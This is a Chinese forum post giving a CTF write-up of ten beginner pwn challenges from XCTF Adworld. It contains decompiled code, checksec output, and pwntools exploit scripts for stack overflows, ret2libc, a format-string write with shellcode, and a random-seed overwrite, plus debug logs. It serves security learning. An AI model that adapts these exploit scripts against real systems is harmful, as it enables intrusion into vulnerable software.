首页
社区
课程
招聘
[原创]XCTF攻防世界-pwn新手练习区全部十题解析
发表于: 2021-5-14 00:34 14571

[原创]XCTF攻防世界-pwn新手练习区全部十题解析

2021-5-14 00:34
14571

最近在看《CTF权威指南-pwn篇》,有时候一个题目觉得看懂了exp和知识点,实际上感受不深可能过几天全忘了。所以我选择做真题加深知识的理解。这里,使用攻防世界的所有pwn新手题来温习一些基本的利用方式。

p.s. 攻防世界创建在线场景一直失败,真是醉了

主要逻辑如下:

典型的ret2win,变量位于.bss段:

直接溢出获取flag:

因为是使用小端序比较数据,所以需要反转下字符串。第一题简单是预想之内的情况,不知道接下来是什么难度。

简单栈溢出,主要流程如下:

这里直接ret2到具体调用system的地方:

脚本:

题目提示rop,然而我直接ret2libc:

脚本如下:

看了下其他人写的wp,似乎rop提示对应的是x64版本的程序,因为x64环境下的传参方式从栈传递变成了寄存器rdi,rsi,rcx,rdx,r8,r9传参,所以调用system时需要特殊gadget(pop rdi)将字符串/bin/sh赋给rdi的形式构造参数。

程序流程比较长,这里笔者长话短说简单阐述下程序情况;首先有个alarm会结束程序运行,使用sed -i s/alarm/isnan/g ./1d3c852354df4609bf8e56fe8e9df316将其直接替换掉1
安全机制如下:

嗯保护很全,程序最后mmap了一段内存让我们输入然后跳过去执行:

需要使用它的格式化字符串漏洞将堆上的首个数据设置成0x55:

在调试中调用printf时栈情况如下:

栈中第二个参数为之前输入的地址数据,那么在x64环境中使用"%7$n"去定位Heap[0],py如下:

这题很简单:

程序从/dev/urandom2中取出随机数作为种子,生成十个随机数让我们猜测,猜对十个随机数即可获胜。这里有一个知识点是当seed固定时,之后生成的随机数都是一样的:

可以观察下面的输出:

从而我们可以利用程序的缓冲区溢出覆盖掉seed的值:

脚本如下:

效果:

题目关键点如下:

有个巨大问题是居然使用al赋给变量值:

所以这可以利用整数溢出的方式,构造261个长度的密码并调试到这一行指令:

构造py:

效果:

程序关键点如下:

gets存在栈溢出危险,我们直接ret到pwn函数中的call system,借用name作为参数'/bin/sh',编写py:

额和名字一样运行就拿shell了:

这题目《ctf竞赛权威指南》上有很相似的例子(page 80),总之就是泄露libc的地址,然后再调用system:

这里参考了大佬的博文更换程序libc3,但运行时还是会报错,索性直接把libc换了然后动态加载器执行:

然后用我的exp就成功执行了,反正可以模拟远程连接的环境也就行了:

一个典型的字符串格式化漏洞,需要我们修改某个变量的值:

gdb调试:

在第十个位置上存放我们的字符串,据此编写exp:

 
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  alarm(0x3Cu);
  setbuf(stdout, 0LL);
  puts("~~ welcome to ctf ~~     ");
  puts("lets get helloworld for bof");
  read(0, &Buf_601068, 0x10uLL);
  if ( target_60106C == 'nuaa' )
    sub_400686();
  return 0LL;
}
__int64 sub_400686()
{
  system("cat flag.txt");
  return 0LL;
}
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  alarm(0x3Cu);
  setbuf(stdout, 0LL);
  puts("~~ welcome to ctf ~~     ");
  puts("lets get helloworld for bof");
  read(0, &Buf_601068, 0x10uLL);
  if ( target_60106C == 'nuaa' )
    sub_400686();
  return 0LL;
}
__int64 sub_400686()
{
  system("cat flag.txt");
  return 0LL;
}
0000601068 ??                Buf_601068 db    ? ;          ; DATA XREF: main+3B↑o
.bss:0000000000601069 ??                db    ? ;
.bss:000000000060106A ??                db    ? ;
.bss:000000000060106B ??                db    ? ;
.bss:000000000060106C ?? ?? ?? ??       target_60106C dd ?            ; DATA XREF: main+4A↑r
0000601068 ??                Buf_601068 db    ? ;          ; DATA XREF: main+3B↑o
.bss:0000000000601069 ??                db    ? ;
.bss:000000000060106A ??                db    ? ;
.bss:000000000060106B ??                db    ? ;
.bss:000000000060106C ?? ?? ?? ??       target_60106C dd ?            ; DATA XREF: main+4A↑r
dc@ubuntu:~/playground/xctf_word/pwn$ echo '12345' > flag.txt
dc@ubuntu:~/playground/xctf_word/pwn$ ./4f2f44c9471d4dc2b59768779e378282
~~ welcome to ctf ~~    
lets get helloworld for bof
1111nuaa
dc@ubuntu:~/playground/xctf_word/pwn$ ./4f2f44c9471d4dc2b59768779e378282
~~ welcome to ctf ~~    
lets get helloworld for bof
1111aaun
12345
dc@ubuntu:~/playground/xctf_word/pwn$ echo '12345' > flag.txt
dc@ubuntu:~/playground/xctf_word/pwn$ ./4f2f44c9471d4dc2b59768779e378282
~~ welcome to ctf ~~    
lets get helloworld for bof
1111nuaa
dc@ubuntu:~/playground/xctf_word/pwn$ ./4f2f44c9471d4dc2b59768779e378282
~~ welcome to ctf ~~    
lets get helloworld for bof
1111aaun
12345
ssize_t vulnerable_function()
{
  char buf; // [rsp+0h] [rbp-80h]
 
  return read(0, &buf, 0x200uLL);
}
int callsystem()
{
  return system("/bin/sh");
}
ssize_t vulnerable_function()
{
  char buf; // [rsp+0h] [rbp-80h]
 
  return read(0, &buf, 0x200uLL);
}
int callsystem()
{
  return system("/bin/sh");
}
text:0000000000400596 55                push    rbp
.text:0000000000400597 48 89 E5          mov     rbp, rsp
.text:000000000040059A BF 84 06 40 00    mov     edi, offset command   ; "/bin/sh"            <------
.text:000000000040059F E8 BC FE FF FF    call    _system
.text:00000000004005A4 5D                pop     rbp
.text:00000000004005A5 C3                retn
text:0000000000400596 55                push    rbp
.text:0000000000400597 48 89 E5          mov     rbp, rsp
.text:000000000040059A BF 84 06 40 00    mov     edi, offset command   ; "/bin/sh"            <------
.text:000000000040059F E8 BC FE FF FF    call    _system
.text:00000000004005A4 5D                pop     rbp
.text:00000000004005A5 C3                retn
from pwn import *
 
context.log_level = "DEBUG"
io = process('291721f42a044f50a2aead748d539df0')
win_function = 0x40059A
payload = 'A'*0x88+p64(win_function)
io.recv()
 
pwnlib.gdb.attach(io,gdbscript='''
break *0x4005C5
c
'''
)
pause()
 
io.send(payload)
io.interactive()
from pwn import *
 
context.log_level = "DEBUG"
io = process('291721f42a044f50a2aead748d539df0')
win_function = 0x40059A
payload = 'A'*0x88+p64(win_function)
io.recv()
 
pwnlib.gdb.attach(io,gdbscript='''
break *0x4005C5
c
'''
)
pause()
 
io.send(payload)
io.interactive()
dc@ubuntu:~/playground/xctf_word/pwn$ pwn checksec 1ab77c073b4f4524b73e086d063f884e
[*] '/home/dc/playground/xctf_word/pwn/1ab77c073b4f4524b73e086d063f884e'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
dc@ubuntu:~/playground/xctf_word/pwn$
 
ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]
 
  system("echo Input:");
  return read(0, &buf, 0x100u);
}
dc@ubuntu:~/playground/xctf_word/pwn$ pwn checksec 1ab77c073b4f4524b73e086d063f884e
[*] '/home/dc/playground/xctf_word/pwn/1ab77c073b4f4524b73e086d063f884e'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
dc@ubuntu:~/playground/xctf_word/pwn$
 
ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]
 
  system("echo Input:");
  return read(0, &buf, 0x100u);
}
from pwn import *
 
context.log_level = "DEBUG"
io = process('./1ab77c073b4f4524b73e086d063f884e')
elf = ELF('./1ab77c073b4f4524b73e086d063f884e')
hit_binsh = 0x804A024
payload = 'A'*0x8C+p32(elf.sym['system'])+'A'*4+p32(hit_binsh)
io.recv()
 
pwnlib.gdb.attach(io,gdbscript='''
break *0x804847F
c
'''
)
pause()
 
io.send(payload)
io.interactive()
from pwn import *
 
context.log_level = "DEBUG"
io = process('./1ab77c073b4f4524b73e086d063f884e')
elf = ELF('./1ab77c073b4f4524b73e086d063f884e')
hit_binsh = 0x804A024
payload = 'A'*0x8C+p32(elf.sym['system'])+'A'*4+p32(hit_binsh)
io.recv()
 
pwnlib.gdb.attach(io,gdbscript='''
break *0x804847F
c
'''
)
pause()
 
io.send(payload)
io.interactive()
dc@ubuntu:~/playground/xctf_word/pwn$ pwn checksec 1d3c852354df4609bf8e56fe8e9df316
[*] '/home/dc/playground/xctf_word/pwn/1d3c852354df4609bf8e56fe8e9df316'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
dc@ubuntu:~/playground/xctf_word/pwn$ pwn checksec 1d3c852354df4609bf8e56fe8e9df316
[*] '/home/dc/playground/xctf_word/pwn/1d3c852354df4609bf8e56fe8e9df316'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
if ( *HEAP_1_D_2_U == HEAP_1_D_2_U[1] )
{
  puts("Wizard: I will help you! USE YOU SPELL");
  v1 = mmap(0LL, 0x1000uLL, 7, 33, -1, 0LL);
  read(0, v1, 0x100uLL);
  (v1)(0LL, v1);
}
if ( *HEAP_1_D_2_U == HEAP_1_D_2_U[1] )
{
  puts("Wizard: I will help you! USE YOU SPELL");
  v1 = mmap(0LL, 0x1000uLL, 7, 33, -1, 0LL);
  read(0, v1, 0x100uLL);
  (v1)(0LL, v1);
}
_isoc99_scanf("%ld", &v2);
puts("And, you wish is:");
_isoc99_scanf("%s", &format);
puts("Your wish is");
printf(&format, &format);
_isoc99_scanf("%ld", &v2);
puts("And, you wish is:");
_isoc99_scanf("%s", &format);
puts("Your wish is");
printf(&format, &format);
0x00007fffffffdb28+0x0000: 0x0000000000400c83  →   mov edi, 0x401c23     ← $rsp
0x00007fffffffdb30+0x0008: 0x00000001f7dca2a0
0x00007fffffffdb38+0x0010: 0x0000000000604260  →  0x0000005500000044 ("D"?)
0x00007fffffffdb40+0x0018: 0x0000000078243125 ("%1$x"?)     ← $rdi
0x00007fffffffdb48+0x0020: 0x00007ffff7a6f4d3  →  <_IO_file_overflow+259> cmp eax, 0xffffffff
0x00007fffffffdb50+0x0028: 0x0000000000000022 ("""?)
0x00007fffffffdb58+0x0030: 0x00007ffff7dce760  →  0x00000000fbad2887
0x00007fffffffdb60+0x0038: 0x0000000000401a68  →  "So, where you will go?east or up?:"
0x00007fffffffdb28+0x0000: 0x0000000000400c83  →   mov edi, 0x401c23     ← $rsp
0x00007fffffffdb30+0x0008: 0x00000001f7dca2a0
0x00007fffffffdb38+0x0010: 0x0000000000604260  →  0x0000005500000044 ("D"?)
0x00007fffffffdb40+0x0018: 0x0000000078243125 ("%1$x"?)     ← $rdi
0x00007fffffffdb48+0x0020: 0x00007ffff7a6f4d3  →  <_IO_file_overflow+259> cmp eax, 0xffffffff
0x00007fffffffdb50+0x0028: 0x0000000000000022 ("""?)
0x00007fffffffdb58+0x0030: 0x00007ffff7dce760  →  0x00000000fbad2887
0x00007fffffffdb60+0x0038: 0x0000000000401a68  →  "So, where you will go?east or up?:"
from pwn import *
context.arch="amd64"
context.log_level = "DEBUG"
io = process('./1d3c852354df4609bf8e56fe8e9df316')
io.recvuntil('secret[0] is ')
secret1 = int(io.recvuntil('\n'),16)
io.recvuntil('secret[1] is ')
secret2 = int(io.recvuntil('\n'),16)
 
log.info("%s %s" % (secret1,secret2))
 
io.recv()
io.sendline('noname')
io.recv()
io.sendline('east')
io.recv()
io.sendline('1')
 
io.recv()           #'Give me an address'
io.sendline(str(secret1))
io.recv()
io.sendline('%085d%7$n')
io.recv()
io.send(asm(shellcraft.sh()))
io.interactive()
from pwn import *
context.arch="amd64"
context.log_level = "DEBUG"
io = process('./1d3c852354df4609bf8e56fe8e9df316')
io.recvuntil('secret[0] is ')
secret1 = int(io.recvuntil('\n'),16)
io.recvuntil('secret[1] is ')
secret2 = int(io.recvuntil('\n'),16)
 
log.info("%s %s" % (secret1,secret2))
 
io.recv()
io.sendline('noname')
io.recv()
io.sendline('east')
io.recv()
io.sendline('1')
 
io.recv()           #'Give me an address'
io.sendline(str(secret1))
io.recv()
io.sendline('%085d%7$n')
io.recv()
io.send(asm(shellcraft.sh()))
io.interactive()
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  int input_num; // [rsp+4h] [rbp-3Ch]
  int index; // [rsp+8h] [rbp-38h]
  int rand_num; // [rsp+Ch] [rbp-34h]
  char name; // [rsp+10h] [rbp-30h]
  unsigned int seed[2]; // [rsp+30h] [rbp-10h]
  unsigned __int64 v9; // [rsp+38h] [rbp-8h]
 
  v9 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  input_num = 0;
  rand_num = 0;
  *seed = sub_BB0();
  puts("-------------------------------");
  puts("Welcome to a guess number game!");
  puts("-------------------------------");
  puts("Please let me know your name!");
  printf("Your name:", 0LL);
  gets(&name);
  srand(seed[0]);
  for ( index = 0; index <= 9; ++index )
  {
    rand_num = rand() % 6 + 1;
    printf("-------------Turn:%d-------------\n", (index + 1));
    printf("Please input your guess number:");
    __isoc99_scanf("%d", &input_num);
    puts("---------------------------------");
    if ( input_num != rand_num )
    {
      puts("GG!");
      exit(1);
    }
    puts("Success!");
  }
  win_C3E();
  return 0LL;
}
__int64 sub_BB0()
{
  int fd; // [rsp+Ch] [rbp-14h]
  __int64 buf; // [rsp+10h] [rbp-10h]
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]
 
  v3 = __readfsqword(0x28u);
  fd = open("/dev/urandom", 0);
  if ( fd < 0 || read(fd, &buf, 8uLL) < 0 )
    exit(1);
  if ( fd > 0 )
    close(fd);
  return buf;
}
__int64 sub_C3E()
{
  printf("You are a prophet!\nHere is your flag!");
  system("cat flag");
  return 0LL;
}
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  int input_num; // [rsp+4h] [rbp-3Ch]
  int index; // [rsp+8h] [rbp-38h]
  int rand_num; // [rsp+Ch] [rbp-34h]
  char name; // [rsp+10h] [rbp-30h]
  unsigned int seed[2]; // [rsp+30h] [rbp-10h]
  unsigned __int64 v9; // [rsp+38h] [rbp-8h]
 
  v9 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  input_num = 0;
  rand_num = 0;
  *seed = sub_BB0();
  puts("-------------------------------");
  puts("Welcome to a guess number game!");
  puts("-------------------------------");
  puts("Please let me know your name!");
  printf("Your name:", 0LL);
  gets(&name);
  srand(seed[0]);
  for ( index = 0; index <= 9; ++index )
  {
    rand_num = rand() % 6 + 1;
    printf("-------------Turn:%d-------------\n", (index + 1));
    printf("Please input your guess number:");
    __isoc99_scanf("%d", &input_num);
    puts("---------------------------------");
    if ( input_num != rand_num )
    {
      puts("GG!");
      exit(1);
    }
    puts("Success!");
  }
  win_C3E();
  return 0LL;
}
__int64 sub_BB0()
{
  int fd; // [rsp+Ch] [rbp-14h]
  __int64 buf; // [rsp+10h] [rbp-10h]
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]
 
  v3 = __readfsqword(0x28u);
  fd = open("/dev/urandom", 0);
  if ( fd < 0 || read(fd, &buf, 8uLL) < 0 )
    exit(1);
  if ( fd > 0 )
    close(fd);
  return buf;
}
__int64 sub_C3E()
{
  printf("You are a prophet!\nHere is your flag!");
  system("cat flag");
  return 0LL;
}
dc@ubuntu:~/playground/xctf_word/pwn$ cat ten_rand_nums_.c
#include <stdio.h>
#include <stdlib.h>     /* srand, rand */
 
int main(void)
{
    srand(0);
 
    for (int index = 0 ; index != 10 ; index++)
        printf("%d ",(rand()%6+1));
 
    return 0;
}
dc@ubuntu:~/playground/xctf_word/pwn$ cat ten_rand_nums_.c
#include <stdio.h>
#include <stdlib.h>     /* srand, rand */
 
int main(void)
{
    srand(0);
 
    for (int index = 0 ; index != 10 ; index++)
        printf("%d ",(rand()%6+1));
 
    return 0;
}
dc@ubuntu:~/playground/xctf_word/pwn$ gcc ten_rand_nums_.c -o ten_rand_nums
dc@ubuntu:~/playground/xctf_word/pwn$ ./ten_rand_nums
2 5 4 2 6 2 5 1 4 2 dc@ubuntu:~/playground/xctf_word/pwn$ ./ten_rand_nums
2 5 4 2 6 2 5 1 4 2 dc@ubuntu:~/playground/xctf_word/pwn$
dc@ubuntu:~/playground/xctf_word/pwn$ gcc ten_rand_nums_.c -o ten_rand_nums
dc@ubuntu:~/playground/xctf_word/pwn$ ./ten_rand_nums
2 5 4 2 6 2 5 1 4 2 dc@ubuntu:~/playground/xctf_word/pwn$ ./ten_rand_nums
2 5 4 2 6 2 5 1 4 2 dc@ubuntu:~/playground/xctf_word/pwn$
-0000000000000030 name db ?
-000000000000002F db ? ; undefined
-000000000000002E db ? ; undefined
-000000000000002D db ? ; undefined
-000000000000002C db ? ; undefined
-000000000000002B db ? ; undefined
-000000000000002A db ? ; undefined
-0000000000000029 db ? ; undefined
-0000000000000028 db ? ; undefined
-0000000000000027 db ? ; undefined
-0000000000000026 db ? ; undefined
-0000000000000025 db ? ; undefined
-0000000000000024 db ? ; undefined
-0000000000000023 db ? ; undefined
-0000000000000022 db ? ; undefined
-0000000000000021 db ? ; undefined
-0000000000000020 db ? ; undefined
-000000000000001F db ? ; undefined
-000000000000001E db ? ; undefined
-000000000000001D db ? ; undefined
-000000000000001C db ? ; undefined
-000000000000001B db ? ; undefined
-000000000000001A db ? ; undefined
-0000000000000019 db ? ; undefined
-0000000000000018 db ? ; undefined
-0000000000000017 db ? ; undefined
-0000000000000016 db ? ; undefined
-0000000000000015 db ? ; undefined
-0000000000000014 db ? ; undefined
-0000000000000013 db ? ; undefined
-0000000000000012 db ? ; undefined
-0000000000000011 db ? ; undefined
-0000000000000010 seed dd 2 dup(?)
-0000000000000030 name db ?
-000000000000002F db ? ; undefined
-000000000000002E db ? ; undefined
-000000000000002D db ? ; undefined
-000000000000002C db ? ; undefined
-000000000000002B db ? ; undefined
-000000000000002A db ? ; undefined
-0000000000000029 db ? ; undefined
-0000000000000028 db ? ; undefined
-0000000000000027 db ? ; undefined
-0000000000000026 db ? ; undefined
-0000000000000025 db ? ; undefined
-0000000000000024 db ? ; undefined
-0000000000000023 db ? ; undefined
-0000000000000022 db ? ; undefined
-0000000000000021 db ? ; undefined
-0000000000000020 db ? ; undefined
-000000000000001F db ? ; undefined
-000000000000001E db ? ; undefined
-000000000000001D db ? ; undefined
-000000000000001C db ? ; undefined
-000000000000001B db ? ; undefined
-000000000000001A db ? ; undefined
-0000000000000019 db ? ; undefined
-0000000000000018 db ? ; undefined
-0000000000000017 db ? ; undefined
-0000000000000016 db ? ; undefined
-0000000000000015 db ? ; undefined
-0000000000000014 db ? ; undefined
-0000000000000013 db ? ; undefined
-0000000000000012 db ? ; undefined
-0000000000000011 db ? ; undefined
-0000000000000010 seed dd 2 dup(?)
from pwn import *
 
context.log_level = "DEBUG"
nums = [2,5,4,2,6,2,5,1,4,2]
 
io = process('./b59204f56a0545e8a22f8518e749f19f')
io.recv()
io.sendline('A'*0x20+'\x00'*4)
 
for num in nums:
    io.recv()
    io.sendline(str(num))
 
io.recv()
from pwn import *
 
context.log_level = "DEBUG"
nums = [2,5,4,2,6,2,5,1,4,2]
 
io = process('./b59204f56a0545e8a22f8518e749f19f')
io.recv()
io.sendline('A'*0x20+'\x00'*4)
 
for num in nums:
    io.recv()
    io.sendline(str(num))
 
io.recv()
dc@ubuntu:~/playground/xctf_word/pwn$ python payload_b59204f56a0545e8a22f8518e749f19f.py
[+] Starting local process './b59204f56a0545e8a22f8518e749f19f' argv=['./b59204f56a0545e8a22f8518e749f19f'] : pid 5635
[DEBUG] Received 0x88 bytes:
    '-------------------------------\n'
    'Welcome to a guess number game!\n'
    '-------------------------------\n'
    'Please let me know your name!\n'
    'Your name:'
[DEBUG] Sent 0x25 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000020  00 00 00 00  0a                                     │····│·│
    00000025
[DEBUG] Received 0x40 bytes:
    '-------------Turn:1-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '2\n'
[DEBUG] Received 0x6b bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:2-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '5\n'
[DEBUG] Received 0x6b bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:3-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '4\n'
[DEBUG] Received 0x6b bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:4-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '2\n'
[DEBUG] Received 0x6b bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:5-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '6\n'
[DEBUG] Received 0x6b bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:6-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '2\n'
[DEBUG] Received 0x6b bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:7-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '5\n'
[DEBUG] Received 0x6b bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:8-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '1\n'
[DEBUG] Received 0x6b bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:9-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '4\n'
[DEBUG] Received 0x6c bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:10-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '2\n'
[*] Process './b59204f56a0545e8a22f8518e749f19f' stopped with exit code 0 (pid 5635)
[DEBUG] Received 0x5a bytes:
    '---------------------------------\n'
    'Success!\n'
    'You are a prophet!\n'
    'Here is your flag!fake_flag\n'
dc@ubuntu:~/playground/xctf_word/pwn$ python payload_b59204f56a0545e8a22f8518e749f19f.py
[+] Starting local process './b59204f56a0545e8a22f8518e749f19f' argv=['./b59204f56a0545e8a22f8518e749f19f'] : pid 5635
[DEBUG] Received 0x88 bytes:
    '-------------------------------\n'
    'Welcome to a guess number game!\n'
    '-------------------------------\n'
    'Please let me know your name!\n'
    'Your name:'
[DEBUG] Sent 0x25 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000020  00 00 00 00  0a                                     │····│·│
    00000025
[DEBUG] Received 0x40 bytes:
    '-------------Turn:1-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '2\n'
[DEBUG] Received 0x6b bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:2-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '5\n'
[DEBUG] Received 0x6b bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:3-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '4\n'
[DEBUG] Received 0x6b bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:4-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '2\n'
[DEBUG] Received 0x6b bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:5-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '6\n'
[DEBUG] Received 0x6b bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:6-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '2\n'
[DEBUG] Received 0x6b bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:7-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '5\n'
[DEBUG] Received 0x6b bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:8-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '1\n'
[DEBUG] Received 0x6b bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:9-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '4\n'
[DEBUG] Received 0x6c bytes:
    '---------------------------------\n'
    'Success!\n'
    '-------------Turn:10-------------\n'
    'Please input your guess number:'
[DEBUG] Sent 0x2 bytes:
    '2\n'
[*] Process './b59204f56a0545e8a22f8518e749f19f' stopped with exit code 0 (pid 5635)
[DEBUG] Received 0x5a bytes:
    '---------------------------------\n'

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2021-5-14 00:45 被顾言庭编辑 ,原因:
收藏
免费 3
支持
分享
最新回复 (2)
雪    币: 177
活跃值: (278)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
level3怎么都不肯加载这个so
2021-5-28 15:27
0
雪    币: 9910
活跃值: (2142)
能力值: ( LV13,RANK:327 )
在线值:
发帖
回帖
粉丝
3
天堂猪 level3怎么都不肯加载这个so[em_9]
我也是试了多次无法正确加载提供的so,猜想可能是因为动态加载器不匹配的原因。我觉得基于stack的pwn实战中只要能运行程序,提供的 libc不加载也行,我的exp里也只是用提供的so做了一些取偏移的操作。
2021-6-3 14:01
0
游客
登录 | 注册 方可回帖
返回
//